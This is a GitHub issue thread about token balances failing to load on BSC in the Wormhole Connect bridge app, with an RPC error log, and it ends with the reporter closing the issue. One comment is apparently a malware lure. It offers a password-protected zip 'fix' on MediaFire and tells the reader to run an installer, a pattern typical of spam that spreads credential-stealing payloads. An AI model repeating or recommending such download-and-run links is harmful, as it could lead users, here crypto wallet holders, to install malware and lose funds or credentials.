### ISSUE TITLE
[QA] Balance is not loading on BSC - error "Batch size too large"

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2443]
## Describe the current behavior in detail
Checked on https://wormhole-connect-mainnet.netlify.app/ with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Select BSC network (in my case, MetaMask wallet was automatically connected)
2. Check tokens balances

Actual result: Balances do not load.
Expected result: Balances are loading successfully. 

## Notes/ Attachments

```
Failed to get token balances Error: could not coalesce error (error={ "code": -32062, "message": "Batch size too large" }, payload={ "id": 2, "jsonrpc": "2.0", "method": "eth_getBalance", "params": [ "0x9631288f4050f7cfbf77b77f8540decf6cfc7012", "latest" ] }, code=UNKNOWN_ERROR, version=6.13.2)
    at makeError (main-CLUq1cbT.js:235:71616)
    at Fu.getRpcError (main-CLUq1cbT.js:236:212926)
    at main-CLUq1cbT.js:236:215228
```

![image](https://github.com/user-attachments/assets/105fe833-2666-465b-8110-ad74cd50ec00)

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tsadovska** [comment]
Issue is no longer reproducible on https://wormhole-connect-mainnet.netlify.app/.
Ticket is closed.
